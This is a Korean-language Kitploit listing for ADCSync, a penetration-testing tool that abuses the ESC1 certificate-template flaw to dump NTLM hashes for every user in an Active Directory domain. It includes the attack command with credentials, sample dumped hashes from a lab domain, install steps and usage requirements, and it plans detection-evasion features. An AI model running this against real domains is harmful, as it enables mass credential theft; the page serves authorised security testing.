Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/jpg0mez/adcsync
Password CrackingExploitationPenetration TestingAuthentication
GitHubjpg0mez/adcsync

ADCSync

ESC1을 사용하여 임시 DCSync를 수행하고 해시를 덤프합니다.

저장소 보기
2122432년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ADCSsync

이 도구는 ESC1을 활용하여 DCSync를 수행하기 위해 빠르게 제가 만든 도구입니다. 속도는 느리지만 DRSUAPI나 Volume Shadow Copy를 사용하지 않고 임시 DCSync 공격을 수행하는 효과적인 방법을 제공합니다.

이 도구의 첫 번째 버전이며, 기본적으로 도메인의 모든 사용자에 대해 Certipy를 실행하는 과정을 자동화합니다. 아직 개선할 점이 많으며, 향후 인증 방법 및 취약한 템플릿을 자동으로 찾는 프로세스를 자동화하는 기능을 추가할 계획입니다.

root@kitploit:~
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

소개

ADCSync는 ESC1 익스플로잇을 사용하여 Active Directory 환경의 사용자 계정에서 NTLM 해시를 덤프합니다. 먼저 전달된 Bloodhound 덤프 파일에서 모든 사용자와 도메인을 가져옵니다. 그런 다음 Certipy를 사용하여 각 사용자에 대한 인증서 요청을 만들고 해당 PFX 파일을 인증서 디렉터리에 저장합니다. 마지막으로 Certipy를 사용하여 인증서로 인증하고 각 사용자의 NT 해시를 검색합니다. 이 과정은 상당히 느리며 완료하는 데 시간이 걸릴 수 있지만 NTLM 해시를 덤프하는 대안적인 방법을 제공합니다.

설치

root@kitploit:~
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

사용법

이 도구를 사용하려면 다음이 필요합니다:

  1. 유효한 도메인 자격 증명
  2. 전달할 Bloodhound 덤프의 사용자 목록
  3. ESC1에 취약한 템플릿 (Certipy find로 찾음)
root@kitploit:~
# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of the target machine  [required]
  --help               Show this message and exit.

TODO

  • NTLM 해시 및 ccache 파일과 같은 대체 인증 방법 지원
  • ESC1에 취약한 템플릿을 찾기 위해 "certipy find" 자동 실행
  • 탐지를 피하기 위한 지터 및 슬립 옵션 추가
  • 모든 변수에 대한 유형 검증 추가

감사의 말

  • puzzlepeaches: 서둘러 작성하라고 재촉해 주셔서 감사합니다
  • ly4k: Certipy를 제공해 주셔서 감사합니다
  • WazeHell: 테스트에 사용된 취약한 AD 환경을 설정하는 스크립트를 제공해 주셔서 감사합니다
도구 다운로드